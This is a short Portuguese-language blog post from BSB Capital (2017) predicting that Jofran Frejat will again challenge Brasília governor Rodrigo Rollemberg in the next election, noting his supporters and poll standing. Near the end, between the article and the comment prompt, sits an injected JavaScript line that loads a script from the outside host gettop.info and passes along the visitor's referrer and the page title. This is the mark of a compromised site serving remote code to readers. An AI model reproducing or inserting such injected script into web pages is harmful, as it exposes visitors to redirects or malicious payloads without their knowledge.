Frejat prepara volta

BSB Capital 23/06/2017 às 16:25, Atualizado em 18/09/2017 às 21:14

O cenário de 2014 pode se repetir na próxima eleição: Rollemberg x Jofran

Sabemos que o governador Rodrigo Rollemberg (PSB) tentará a reeleição e já mexe os seus pauzinhos, mesmo com uma reprovação popular na casa dos 80%, conforme mostram as pesquisas. A questão é: quem será o adversário de Rollemberg?

Vários pré-candidatos postulam esse papel. Alguns andam pelas cidades e se colocam à disposição de sua excelência o eleitor. Mas tudo leva a crer que teremos quase o mesmo cenário de 2014: o mais cotado para enfrentar Rollemberg é Jofran Frejat (PR), que disputou o segundo turno com ele em 2014.

Nos últimos dois anos e meio, Frejat se afastou da confusão. Ficou de longe observando o cenário. Mesmo assim, sempre que há uma pesquisa, ele aparece nas três primeiras posições. E, nesse ínterim, tem conseguido apoios.

Uma das primeiras a declarar que estará com Frejat foi a ex-deputada distrital Eliana Pedrosa (sem partido). Mas ele também tem participado de reuniões com o ex-distrital e presidente do PTB-DF, Alírio Neto.

Assim, Jofran Frejat caminha para ser o candidato da direita, sempre dividida.

Ainda tem muita estrada pela frente, mas ela está sendo pavimentada.

Ah! Bem longe de Arruda!

         s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Deixe um comentário

Rolar para cima